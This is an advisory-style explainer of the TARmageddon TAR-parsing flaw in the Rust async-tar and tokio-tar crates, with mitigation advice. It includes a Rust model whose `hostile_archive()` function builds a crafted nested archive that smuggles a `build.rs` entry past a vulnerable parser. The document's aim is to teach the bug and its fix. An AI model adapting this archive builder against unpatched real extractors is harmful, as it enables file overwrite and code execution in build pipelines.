A critical vulnerability dubbed TARmageddon (CVE-2025-62518) affects the async-tar and tokio-tar Rust libraries: a crafted archive with a nested TAR can smuggle extra entries into an extraction, which an attacker can escalate to remote code execution when the extracted files feed a build or install step. Patched forks exist, but the original crates are unmaintained and widely depended on, so unpatched copies remain in many projects. #CVE202562518 #tokio-tar
Keypoints
- The root cause is a parser desynchronization: when an entry's PAX extended header and its ustar header disagree about the entry size, the affected code reads the entry using one size but advances the stream using the other, so the bytes of a nested TAR inside that entry are parsed as additional top-level entries.
- Those smuggled entries are written like any other, so they can overwrite files in the extraction directory; in a pipeline that extracts untrusted archives, overwriting a build script or manifest turns the bug into code execution.
- The bug lives in the shared parsing code, so the unmaintained originals and their forks are all affected; tokio-tar alone has over 7 million downloads.
- Many downstream projects, among them Binstalk and wasmCloud, are exposed transitively through their dependency on the affected libraries.
- Developers are advised to move to a maintained, patched fork (astral-tokio-tar is one) or drop the dependency entirely, and to check lockfiles for transitive pulls with `cargo tree -i tokio-tar` and `cargo tree -i async-tar`, since a project that never imports the crate directly can still ship it.
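To make the desynchronization concrete, below is an added, std-only Rust model of the bug class; it is not code from async-tar, tokio-tar or any fork, and it does not reproduce the real parser's details. It builds a constructed hostile archive (an outer entry whose ustar size field says 0 while its PAX header declares the true size of an embedded inner TAR), then walks it twice: once advancing by the ustar size (the vulnerable behaviour) and once advancing by the same size used to read the entry (the fix). The entry names, payload and the `PaxHeaders/` naming are assumptions chosen for the example.

```rust
// Added example (not library code): minimal model of the CVE-2025-62518 desync.
const BLOCK: usize = 512;

/// Round a byte count up to the next 512-byte block boundary.
fn padded(n: u64) -> usize {
    (n as usize + BLOCK - 1) / BLOCK * BLOCK
}

/// Parse a NUL/space-terminated octal header field (the ustar size field).
fn parse_octal(field: &[u8]) -> u64 {
    let digits: String = field.iter().take_while(|&&b| b != 0 && b != b' ').map(|&b| b as char).collect();
    u64::from_str_radix(&digits, 8).unwrap_or(0)
}

/// NUL-terminated name field to String.
fn cstr(field: &[u8]) -> String {
    let end = field.iter().position(|&b| b == 0).unwrap_or(field.len());
    String::from_utf8_lossy(&field[..end]).into_owned()
}

/// One 512-byte ustar header. `size` is whatever the caller wants the ustar
/// size field to claim; a hostile archive may make it disagree with PAX.
fn ustar_header(name: &str, typeflag: u8, size: u64) -> [u8; BLOCK] {
    let mut h = [0u8; BLOCK];
    h[..name.len()].copy_from_slice(name.as_bytes());
    h[100..108].copy_from_slice(b"0000644\0");
    h[108..116].copy_from_slice(b"0000000\0");
    h[116..124].copy_from_slice(b"0000000\0");
    h[124..136].copy_from_slice(format!("{:011o}\0", size).as_bytes());
    h[136..148].copy_from_slice(b"00000000000\0");
    h[148..156].copy_from_slice(b"        "); // checksum field is summed as spaces
    h[156] = typeflag;
    h[257..263].copy_from_slice(b"ustar\0");
    h[263..265].copy_from_slice(b"00");
    let sum: u32 = h.iter().map(|&b| b as u32).sum();
    h[148..156].copy_from_slice(format!("{:06o}\0 ", sum).as_bytes());
    h
}

/// Header plus block-padded data. `claimed_size` goes into the ustar header
/// and need not match `data.len()` (that mismatch is the attacker's lever).
fn entry(name: &str, typeflag: u8, claimed_size: u64, data: &[u8]) -> Vec<u8> {
    let mut v = ustar_header(name, typeflag, claimed_size).to_vec();
    v.extend_from_slice(data);
    v.resize(BLOCK + padded(data.len() as u64), 0);
    v
}

/// A PAX record is "<len> key=value\n" where <len> counts the whole record.
fn pax_record(key: &str, value: &str) -> Vec<u8> {
    let body_len = 1 + key.len() + 1 + value.len() + 1; // " key=value\n"
    let mut len = body_len + 1;
    while len.to_string().len() + body_len != len {
        len += 1;
    }
    format!("{} {}={}\n", len, key, value).into_bytes()
}

/// Extract the `size` override from a PAX extended header body, if present.
fn pax_size(body: &[u8]) -> Option<u64> {
    String::from_utf8_lossy(body).lines().find_map(|rec| {
        let (k, v) = rec.split_once(' ')?.1.split_once('=')?;
        if k == "size" { v.parse().ok() } else { None }
    })
}

/// Walk an archive and return (name, reported size) for each regular entry.
/// `advance_by_pax_size == false` models the vulnerable behaviour; `true`
/// models the fix: the size used to read the data is also the size skipped.
pub fn list_entries(archive: &[u8], advance_by_pax_size: bool) -> Vec<(String, u64)> {
    let mut out = Vec::new();
    let mut pos = 0usize;
    let mut pending_pax_size: Option<u64> = None;
    while pos + BLOCK <= archive.len() {
        let hdr = &archive[pos..pos + BLOCK];
        if hdr.iter().all(|&b| b == 0) {
            break; // end-of-archive marker
        }
        let name = cstr(&hdr[..100]);
        let ustar_size = parse_octal(&hdr[124..136]);
        let typeflag = hdr[156];
        pos += BLOCK;
        if typeflag == b'x' {
            let end = (pos + ustar_size as usize).min(archive.len());
            pending_pax_size = pax_size(&archive[pos..end]);
            pos += padded(ustar_size);
            continue;
        }
        let reported = pending_pax_size.take().unwrap_or(ustar_size);
        out.push((name, reported));
        // The desync: size came from PAX, but the vulnerable path skips by the
        // ustar field, so with ustar size 0 the next "header" is read from
        // inside this entry's own payload (the nested TAR).
        let skip = if advance_by_pax_size { reported } else { ustar_size };
        pos += padded(skip);
    }
    out
}

/// Constructed hostile archive: outer entry `data.bin` has ustar size 0 but a
/// PAX `size` equal to the embedded inner TAR, which carries `build.rs`.
pub fn hostile_archive() -> Vec<u8> {
    let payload = b"fn main() { /* smuggled */ }\n";
    let mut inner = entry("build.rs", b'0', payload.len() as u64, payload);
    inner.extend_from_slice(&[0u8; 2 * BLOCK]);
    let pax = pax_record("size", &inner.len().to_string());
    let mut outer = entry("PaxHeaders/data.bin", b'x', pax.len() as u64, &pax);
    outer.extend(entry("data.bin", b'0', 0, &inner)); // ustar says 0, PAX says inner.len()
    outer.extend_from_slice(&[0u8; 2 * BLOCK]);
    outer
}

fn main() {
    let tar = hostile_archive();
    println!("vulnerable walk: {:?}", list_entries(&tar, false));
    println!("fixed walk:      {:?}", list_entries(&tar, true));
}
```

The vulnerable walk lists `data.bin` and then `build.rs`, even though `build.rs` exists only inside the payload of `data.bin`; an extractor that writes every listed entry would therefore drop an attacker-chosen `build.rs` into the target directory. The fixed walk lists `data.bin` alone. The general rule the fix encodes is that whichever size a parser uses to read an entry's data must also be the size it uses to find the next header; any two sources of truth for entry length are a smuggling primitive.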